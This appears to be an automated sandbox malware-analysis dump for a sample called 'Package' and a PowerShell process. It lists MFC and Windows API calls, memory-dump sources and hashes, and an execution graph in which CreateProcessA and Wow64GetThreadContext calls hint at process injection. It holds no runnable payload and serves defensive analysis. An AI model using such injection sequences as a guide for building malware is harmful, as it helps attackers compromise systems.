                                                                          • Opcode Fuzzy Hash: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                          • Instruction Fuzzy Hash: 4CF030326086087ADB109B60DC01FAABB5DFB85740F444026BA1C850E1C7B5BD65CEF0
                                                                          APIs
                                                                          • #2294.MFC42U(?,000000A2,?), ref: 00D30B04
                                                                          • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00D30B18
                                                                          • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D30B2C
                                                                          • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D30B3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2294
                                                                          • String ID:
                                                                          • API String ID: 314497554-0
                                                                          • Opcode ID: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                          • Instruction ID: 21586a8e69a44d6d62c5c7bbbe1c73bd8f212fcb182f77e98900409cec0eb225
                                                                          • Opcode Fuzzy Hash: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                          • Instruction Fuzzy Hash: AAF0E5722407097EE711AB61DC05FE6BB6DEB41750F404032BA18890E1DBB1ADA5DBF0
                                                                          APIs
                                                                          • #2294.MFC42U(?,00000093,?), ref: 00D2CAB4
                                                                          • #2294.MFC42U(?,0000008E,?,?,00000093,?), ref: 00D2CAC8
                                                                          • #2293.MFC42U(?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00D2CADC
                                                                          • #2362.MFC42U(?,00000082,?,?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00D2CAF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2294$#2293#2362
                                                                          • String ID:
                                                                          • API String ID: 983985581-0
                                                                          • Opcode ID: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                          • Instruction ID: a4ca28452d19992ce364e688530fd8a2cd76e25e0f01a42c040917fb16bc3922
                                                                          • Opcode Fuzzy Hash: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                          • Instruction Fuzzy Hash: 40F0E5722406097AD7159B51DC41FEABB5DFB40750F408132BA18864E1DBB1AE65DBF0
                                                                          APIs
                                                                          • #2294.MFC42U(?,000000A2,?), ref: 00D2C634
                                                                          • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00D2C648
                                                                          • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D2C65C
                                                                          • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D2C66D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2294
                                                                          • String ID:
                                                                          • API String ID: 314497554-0
                                                                          • Opcode ID: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                          • Instruction ID: 7632f29423f0de71e4b8f08cdf9d0eb9ab5489dc6c10a5fdfc7fb397bafd832c
                                                                          • Opcode Fuzzy Hash: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                          • Instruction Fuzzy Hash: 7BF0E572240709BEE711AB61DC06FA6BB6DEB45750F408032BA18990E1D7B1AD65DBF0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3B467
                                                                          • #489.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B478
                                                                          • #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B492
                                                                          • #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B4AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #567$#489H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 3691984168-0
                                                                          • Opcode ID: 45f35857fa5df4c926e141aa98cbdb54a1c9a69ac0cdb0cf452d1e8ab885c391
                                                                          • Instruction ID: e78891e92b5567c313461cf2f0096f6923b915f8a5478404858ae94ebdcb5784
                                                                          • Opcode Fuzzy Hash: 45f35857fa5df4c926e141aa98cbdb54a1c9a69ac0cdb0cf452d1e8ab885c391
                                                                          • Instruction Fuzzy Hash: BFF01C71A0031A9BDB04AF9489463DCBBB0FF54704FA0441DE5847B3C2CBB41A05CBB2
                                                                          APIs
                                                                            • Part of subcall function 00D3FB48: GetModuleHandleW.KERNEL32(00000000), ref: 00D3FB4F
                                                                          • __set_app_type.MSVCRT ref: 00D3ED92
                                                                          • __p__fmode.MSVCRT ref: 00D3EDA8
                                                                          • __p__commode.MSVCRT ref: 00D3EDB6
                                                                          • __setusermatherr.MSVCRT ref: 00D3EDD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                          • String ID:
                                                                          • API String ID: 1632413811-0
                                                                          • Opcode ID: 8c265a07ad23195b4abc41c3211c50ab20a03984ca9c39bd878d67179080bd40
                                                                          • Instruction ID: deb0b003605d83f2a8673101e9e7f3a9f4e74cf9e3241f4a61e068fd473dfee2
                                                                          • Opcode Fuzzy Hash: 8c265a07ad23195b4abc41c3211c50ab20a03984ca9c39bd878d67179080bd40
                                                                          • Instruction Fuzzy Hash: 8BF0F8789013049FC3286F78EC1A6097BA0EB07322F110629F061C63F1CF798581CA70
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2C938
                                                                          • #2634.MFC42U(00000000), ref: 00D2C946
                                                                          • #6195.MFC42U(00D221A0,00000000), ref: 00D2C952
                                                                          • #2634.MFC42U(00000001), ref: 00D2C95B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634$#6195MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2287514142-0
                                                                          • Opcode ID: da7e6adb3626314f2da7c25e323baf532faf2da8d9064a21eb5792c15c610749
                                                                          • Instruction ID: eef371663cccf874cc5c96e4321cea89d576d55d6b95e11d70734fe6b2adbfc4
                                                                          • Opcode Fuzzy Hash: da7e6adb3626314f2da7c25e323baf532faf2da8d9064a21eb5792c15c610749
                                                                          • Instruction Fuzzy Hash: 0DE017313903366BFA3126207C0BFD92B12CB90F55F164064B7086E2D78EA26983D5F5
                                                                          APIs
                                                                          • #6205.MFC42U(?,00000001,00000001), ref: 00D31AD1
                                                                          • #6205.MFC42U(?,00000001,00000001,?,00000001,00000001), ref: 00D31AE1
                                                                          • #6211.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00D31AE9
                                                                          • #2385.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00D31AF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6205$#2385#6211
                                                                          • String ID:
                                                                          • API String ID: 1216781411-0
                                                                          • Opcode ID: 5713caf9c3b811b2e75ad56558bece082be6afb49d17ac946d6ce935d268ddc7
                                                                          • Instruction ID: e63e1ad37016511f7c95675dbacf6d88256488f897ddf5d21c68e5347a357abc
                                                                          • Opcode Fuzzy Hash: 5713caf9c3b811b2e75ad56558bece082be6afb49d17ac946d6ce935d268ddc7
                                                                          • Instruction Fuzzy Hash: 11E012A5A003186BCF34EBA58CD9DEFB79DFB88344F800429B05AA72C2D9246D0587B0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3B383
                                                                          • #324.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B395
                                                                          • #540.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3A7
                                                                          • #861.MFC42U(00D221A0,00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #324#540#861H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 2127517272-0
                                                                          • Opcode ID: f92a071055589357072a3f0b83641fc6d7978d835f3766dabb30817aef044d6e
                                                                          • Instruction ID: 29fd3cc4175d50dd19f841c6b788dbd4a466e6986105058f45687ab4756cbdf6
                                                                          • Opcode Fuzzy Hash: f92a071055589357072a3f0b83641fc6d7978d835f3766dabb30817aef044d6e
                                                                          • Instruction Fuzzy Hash: E8E04F76A0430AABDB05EBA49842BED7B61FFA4304F104018F240572C2DFF04614D776
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #736#794#796#807
                                                                          • String ID:
                                                                          • API String ID: 2485769241-0
                                                                          • Opcode ID: 23dc1089510ccd4f17a84601aad718cf3e33a253056741276e9e987db124cc9c
                                                                          • Instruction ID: 948b4aaf71afa54a5335718023f045039b749b495b73233522d1471221923a55
                                                                          • Opcode Fuzzy Hash: 23dc1089510ccd4f17a84601aad718cf3e33a253056741276e9e987db124cc9c
                                                                          • Instruction Fuzzy Hash: 4EE0B6311066508BC326EF60E851AD6B3A0EF61310F2145AD94A7072D1DF702A05CBB0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #609$#693
                                                                          • String ID:
                                                                          • API String ID: 2192965535-0
                                                                          • Opcode ID: 4a753daaa9a56cda78490bf96d641c4a25524fe220ba542e3efb51dc0fa62046
                                                                          • Instruction ID: 50f170882787f36858a8d7fa3427f55af452cfa29c45c296703754c6d8a87d58
                                                                          • Opcode Fuzzy Hash: 4a753daaa9a56cda78490bf96d641c4a25524fe220ba542e3efb51dc0fa62046
                                                                          • Instruction Fuzzy Hash: C5D01731080A169BC339EB30E491AEAF392EF54381F61452EB0A7031D1AF606A04CBB0
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 6E2F3659
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 2118026453-2084237596
                                                                          • Opcode ID: 931d87fd20521d2b28765a6a2d3793cb076e2f242a420d642d2883baa8509acc
                                                                          • Instruction ID: 763ad571ba25f86dd4414f2a2589d69e5f47c5f1a7657722354dd9f6de7227d5
                                                                          • Opcode Fuzzy Hash: 931d87fd20521d2b28765a6a2d3793cb076e2f242a420d642d2883baa8509acc
                                                                          • Instruction Fuzzy Hash: AD4137B294020EEBDF06CF94C994AEEBBB6BF48305F144059E914A7220D7359952DB51
                                                                          APIs
                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 00D3D4A1
                                                                          • wsprintfW.USER32 ref: 00D3D4B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FromStringwsprintf
                                                                          • String ID: CLSID\%s\%s
                                                                          • API String ID: 1205525775-576494604
                                                                          • Opcode ID: e5b7049e74b61de54cfb0db2cc9c9eb9804c56622a9bca51762fd06dd1c6b3cc
                                                                          • Instruction ID: aaaa5fb4492a167bcd1981084ca3d7d8ceeb7ba21665241273218e8bc1c67501
                                                                          • Opcode Fuzzy Hash: e5b7049e74b61de54cfb0db2cc9c9eb9804c56622a9bca51762fd06dd1c6b3cc
                                                                          • Instruction Fuzzy Hash: B6F0F976A00318AB8B00EF99DD459EF77BDEB86715B104025FD02EB250D675AB0A8BA0
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(6E306FE8), ref: 6E2F86BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: @p0n$o0n
                                                                          • API String ID: 3664257935-931009579
                                                                          • Opcode ID: be2866feedf5516af3cb640b7a2e5ee971de35edfc7abb190ddf6c4fd70586ed
                                                                          • Instruction ID: b0d388ba868f6d970996ccde84af56851499c98be0305acd6798a9e8a51165e7
                                                                          • Opcode Fuzzy Hash: be2866feedf5516af3cb640b7a2e5ee971de35edfc7abb190ddf6c4fd70586ed
                                                                          • Instruction Fuzzy Hash: 64E07236C6061FCBEB201E8AF400380FBEA4B01337F20121AE5F8120E0D3B088D3CA89
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #4709#6195
                                                                          • String ID: System Configuration
                                                                          • API String ID: 513596607-3459905039
                                                                          • Opcode ID: 7be1e1329e5e4c87c7c98b21df3ddbd93172d84da467d4b235ac097a30233983
                                                                          • Instruction ID: cccee5301b06a8d97f6248c4f0b817980e801501b442d5c9f72998de1e658074
                                                                          • Opcode Fuzzy Hash: 7be1e1329e5e4c87c7c98b21df3ddbd93172d84da467d4b235ac097a30233983
                                                                          • Instruction Fuzzy Hash: 48B09222A662B42A56B43534380289E024ADAC2626B960576B411A32C1DC98CE0612F0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: free
                                                                          • String ID:
                                                                          • API String ID: 1294909896-0
                                                                          • Opcode ID: e01647b0a5888b21e172bfc1dd85bf05ed5d2b697ab94e829c6d447e5cd7b475
                                                                          • Instruction ID: c9144df293f5b2df9a19a9e3cedae3153ac7d2aa0927a58a531b2a72d09fcdd1
                                                                          • Opcode Fuzzy Hash: e01647b0a5888b21e172bfc1dd85bf05ed5d2b697ab94e829c6d447e5cd7b475
                                                                          • Instruction Fuzzy Hash: F3F0F431020B11DFD7392F24E80D7C67BE1EF01722F1A682DE0A6604B19B75A8C5CFA0

                                                                          Execution Graph

                                                                          Execution Coverage:6.3%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:19
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 6066 4725368 6068 472537b 6066->6068 6067 47253e5 6068->6067 6071 4725578 6068->6071 6073 472557d 6071->6073 6072 4725419 6073->6072 6078 47268e0 6073->6078 6082 47268d5 6073->6082 6086 47264c0 6073->6086 6090 47264b9 6073->6090 6079 4726969 6078->6079 6079->6079 6080 4726ace CreateProcessA 6079->6080 6081 4726b2b 6080->6081 6083 47268e0 CreateProcessA 6082->6083 6085 4726b2b 6083->6085 6087 47264e6 Wow64GetThreadContext 6086->6087 6089 472654d 6087->6089 6089->6073 6091 47264bf Wow64GetThreadContext 6090->6091 6093 472654d 6091->6093 6093->6073

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 75c2760-75c2785 1 75c28c9-75c2915 0->1 2 75c278b-75c2790 0->2 7 75c291b-75c2920 1->7 8 75c2a66-75c2aac 1->8 5 75c27a8-75c27b4 2->5 6 75c2792-75c2798 2->6 14 75c27ba-75c27bd 5->14 15 75c2876-75c2880 5->15 9 75c279c-75c27a6 6->9 10 75c279a 6->10 12 75c2938-75c293c 7->12 13 75c2922-75c2928 7->13 25 75c2d0a-75c2d3c 8->25 26 75c2ab2-75c2ab7 8->26 9->5 10->5 19 75c2a16-75c2a20 12->19 20 75c2942-75c2944 12->20 17 75c292c-75c2936 13->17 18 75c292a 13->18 14->15 22 75c27c3-75c27ca 14->22 23 75c288e-75c2894 15->23 24 75c2882-75c288b 15->24 17->12 18->12 27 75c2a2e-75c2a34 19->27 28 75c2a22-75c2a2b 19->28 29 75c2946-75c2957 20->29 30 75c2987 20->30 22->1 31 75c27d0-75c27d5 22->31 35 75c289a-75c28a6 23->35 36 75c2896-75c2898 23->36 53 75c2d3e-75c2d5b 25->53 54 75c2d75-75c2d7f 25->54 32 75c2acf-75c2ad3 26->32 33 75c2ab9-75c2abf 26->33 38 75c2a3a-75c2a46 27->38 39 75c2a36-75c2a38 27->39 29->8 57 75c295d-75c2965 29->57 34 75c2989-75c298b 30->34 40 75c27ed-75c27f1 31->40 41 75c27d7-75c27dd 31->41 48 75c2ad9-75c2add 32->48 49 75c2cb2-75c2cbc 32->49 43 75c2ac1 33->43 44 75c2ac3-75c2acd 33->44 34->19 45 75c2991-75c2993 34->45 46 75c28a8-75c28c6 35->46 36->46 47 75c2a48-75c2a63 38->47 39->47 40->15 55 75c27f7-75c27f9 40->55 51 75c27df 41->51 52 75c27e1-75c27eb 41->52 43->32 44->32 58 75c29ad-75c29b9 45->58 59 75c2995-75c299b 45->59 63 75c2b1d 48->63 64 75c2adf-75c2af0 48->64 60 75c2cbe-75c2cc7 49->60 61 75c2cca-75c2cd0 49->61 51->40 52->40 92 75c2d5d-75c2d6f 53->92 93 75c2dc5-75c2dca 53->93 67 75c2d88-75c2d8e 54->67 68 75c2d81-75c2d85 54->68 55->15 66 75c27fb 55->66 70 75c297d-75c2985 57->70 71 75c2967-75c296d 57->71 89 75c29bb-75c29c1 58->89 90 75c29d1-75c2a13 58->90 72 75c299d 59->72 73 75c299f-75c29ab 59->73 74 75c2cd6-75c2ce2 61->74 75 75c2cd2-75c2cd4 61->75 65 75c2b1f-75c2b21 63->65 64->25 91 75c2af6-75c2afb 64->91 65->49 82 75c2b27-75c2b2d 65->82 95 75c2802-75c2804 66->95 83 75c2d94-75c2da0 67->83 84 75c2d90-75c2d92 67->84 70->34 85 75c296f 71->85 86 75c2971-75c297b 71->86 72->58 73->58 87 75c2ce4-75c2d07 74->87 75->87 82->49 94 75c2b33-75c2b40 82->94 96 75c2da2-75c2dc2 83->96 84->96 85->70 86->70 101 75c29c5-75c29c7 89->101 102 75c29c3 89->102 103 75c2afd-75c2b03 91->103 104 75c2b13-75c2b1b 91->104 92->54 93->92 106 75c2bd6-75c2c15 94->106 107 75c2b46-75c2b4b 94->107 108 75c281c-75c2873 95->108 109 75c2806-75c280c 95->109 101->90 102->90 112 75c2b05 103->112 113 75c2b07-75c2b11 103->113 104->65 139 75c2c1c-75c2c20 106->139 114 75c2b4d-75c2b53 107->114 115 75c2b63-75c2b79 107->115 116 75c280e 109->116 117 75c2810-75c2812 109->117 112->104 113->104 123 75c2b55 114->123 124 75c2b57-75c2b61 114->124 115->106 130 75c2b7b-75c2b9b 115->130 116->108 117->108 123->115 124->115 133 75c2b9d-75c2ba3 130->133 134 75c2bb5-75c2bd4 130->134 136 75c2ba5 133->136 137 75c2ba7-75c2bb3 133->137 134->139 136->134 137->134 142 75c2c22-75c2c2b 139->142 143 75c2c43 139->143 144 75c2c2d-75c2c30 142->144 145 75c2c32-75c2c3f 142->145 146 75c2c46-75c2c52 143->146 147 75c2c41 144->147 145->147 149 75c2c58-75c2caf 146->149 147->146
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q$tP]q$tP]q
                                                                          • API String ID: 0-2836991056
                                                                          • Opcode ID: 427728818ebef815f3aeb2de77ffdc10f6231257e0e6879405aae4fcfb8cd246
                                                                          • Instruction ID: 393f88bb4142ae8ec409612b7abca569ffaf41046a1d612d6c6cfb845dde8a31
                                                                          • Opcode Fuzzy Hash: 427728818ebef815f3aeb2de77ffdc10f6231257e0e6879405aae4fcfb8cd246
                                                                          • Instruction Fuzzy Hash: 2302F2B1B042059FCB24CFA9D944BEABBA6FF85710F18C4AFD4058B255DB35D841CBA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
